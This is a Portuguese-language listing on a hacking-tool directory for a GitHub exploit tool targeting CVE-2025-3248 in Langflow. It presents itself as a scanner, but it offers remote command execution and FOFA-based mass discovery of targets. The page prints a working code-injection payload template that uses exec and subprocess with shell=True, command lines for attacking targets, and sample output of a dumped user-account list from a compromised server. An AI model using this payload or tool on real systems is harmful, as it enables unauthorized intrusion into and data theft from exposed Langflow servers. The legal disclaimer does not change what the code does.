Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3248 — Um scanner de vulnerabilidades para CVE-2025-3248 em aplicativos Langflow. 用于扫描 Langflow 应用中 CVE-2025-3248 漏洞的工具。 | Kitploit
Ferramentas/GitHubGitHub/xuemian168/cve-2025-3248
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesComando e Controle
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

Um scanner de vulnerabilidades para CVE-2025-3248 em aplicativos Langflow. 用于扫描 Langflow 应用中 CVE-2025-3248 漏洞的工具。

Ver Repositório
1027há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Site
Compartilhar

中文 | Inglês

Scanner de Vulnerabilidades Langflow

Um scanner de vulnerabilidades para CVE-2025-3248 em aplicações Langflow.

Recursos

  • Escaneie um único alvo ou múltiplos alvos usando FOFA
  • Execute comandos do sistema em alvos vulneráveis
  • Obtenha informações do sistema
  • Suporte a payload personalizado
  • Barra de progresso para escaneamento FOFA
  • Interface CLI bonita

Instalação

  1. Clone o repositório:
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. Instale as dependências:
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. Edite o Arquivo de Ambiente (opcional)
# After you finish editing
mv .env.example .env

Uso

Escaneamento de Alvo Único

python main.py -t https://target.com

Usando a API FOFA

python main.py --fofa-email [email protected] --fofa-key your_api_key

Opções Adicionais

  • -t, --target: URL do alvo para escanear
  • --fofa-email: Email da API FOFA
  • --fofa-key: Chave da API FOFA
  • --fofa-query: Consulta de pesquisa FOFA (padrão: 'app="LOGSPACE-LangFlow"')
  • --country: Filtre resultados por código de país (ex.: CN, US)
  • --max-pages: Número máximo de páginas FOFA a recuperar (padrão: 5)
  • --page-size: Resultados por página (padrão: 100)
  • --timeout: Tempo limite de requisição em segundos (padrão: 10)
  • --no-verify: Desabilite a verificação SSL
  • --threads: Número de threads para escaneamento concorrente (padrão: 5)
  • -f, --file: Arquivo Python personalizado para usar como payload

Payloads Personalizados

Você pode criar payloads personalizados criando um arquivo Python:

def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

Em seguida, use-o com:

python main.py -t https://target.com -f your_payload.py

Exemplo de Saída

    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

Aviso Legal

⚠️ Aviso Legal Esta ferramenta é apenas para fins legais. Foi projetada para fins educacionais, testes de segurança internos em empresas ou uso em ambientes autorizados. É estritamente proibido usar esta ferramenta em qualquer sistema, rede ou dispositivo não autorizado, caso contrário, pode violar leis e regulamentos relevantes.

Os usuários devem assumir todas as responsabilidades legais por suas ações. O autor e os contribuidores não são responsáveis por quaisquer perdas, vazamento de dados ou consequências legais causadas pelo uso inadequado desta ferramenta.

⚠️ Não use para ataques ilegais. Não tente implantar ou executar esta ferramenta em sistemas não autorizados.

Referências

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

Licença

Licença MIT

Baixar ferramenta